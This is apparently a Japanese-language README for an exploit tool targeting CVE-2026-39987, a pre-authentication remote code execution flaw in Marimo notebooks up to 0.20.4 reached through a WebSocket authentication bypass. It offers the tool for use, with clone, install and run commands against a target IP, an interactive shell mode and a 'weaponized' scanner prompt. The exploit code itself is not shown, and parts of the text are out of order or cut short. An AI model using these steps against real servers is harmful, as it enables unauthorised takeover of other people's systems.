
Marimoの事前認証RCE(WebSocket認証バイパス経由)のエクスプロイトで、影響を受けるバージョンで対話型シェルアクセスを提供します。
| 属性 | 詳細 |
|---|
| CVE ID | CVE-2026-39987 |
| 攻撃ベクトル | WebSocket 認証バイパス |
| シェルの種類 | インタラクティブ PTY(擬似端末) |
| 影響 | 完全なリモートコード実行(RCE) |
| CVSS スコア | 9.3(クリティカル) |
| 影響を受けるバージョン | Marimo ≤ 0.20.4 |
この脆弱性は、Marimo アプリケーションの WebSocket ハンドシェイクメカニズムに存在します。認証検証が不適切なため、攻撃者は以下を行うことができます:
根本原因:WebSocket アップグレードハンドラーにおける認証チェックの欠如により、認証なしのコマンドインジェクションが可能になります。
# リポジトリをクローン
python3 -m venv venv
source venv/bin/activate
git clone https://github.com/mki9/CVE-2026-39987_exploit.git
cd CVE-2026-39987_exploit
chmod +x *
# エクスプロイトコマンド
* / インタラクティブシェル(デフォルト)
1 / python CVE-2026-39987_exploit.py <TARGET_IP>
* / help
2 / python CVE-2026-39987_exploit.py
# 必要な依存関係をインストール
pip install websocket-client colorama rich pyfiglet
python CVE-2026-39987_scanner.py
# 入力
[*] Weaponized WebSocket Exploit Test
[!] Authorized Use Only
[?] Enter target IP address or hostname:
>> <TARGET_IP>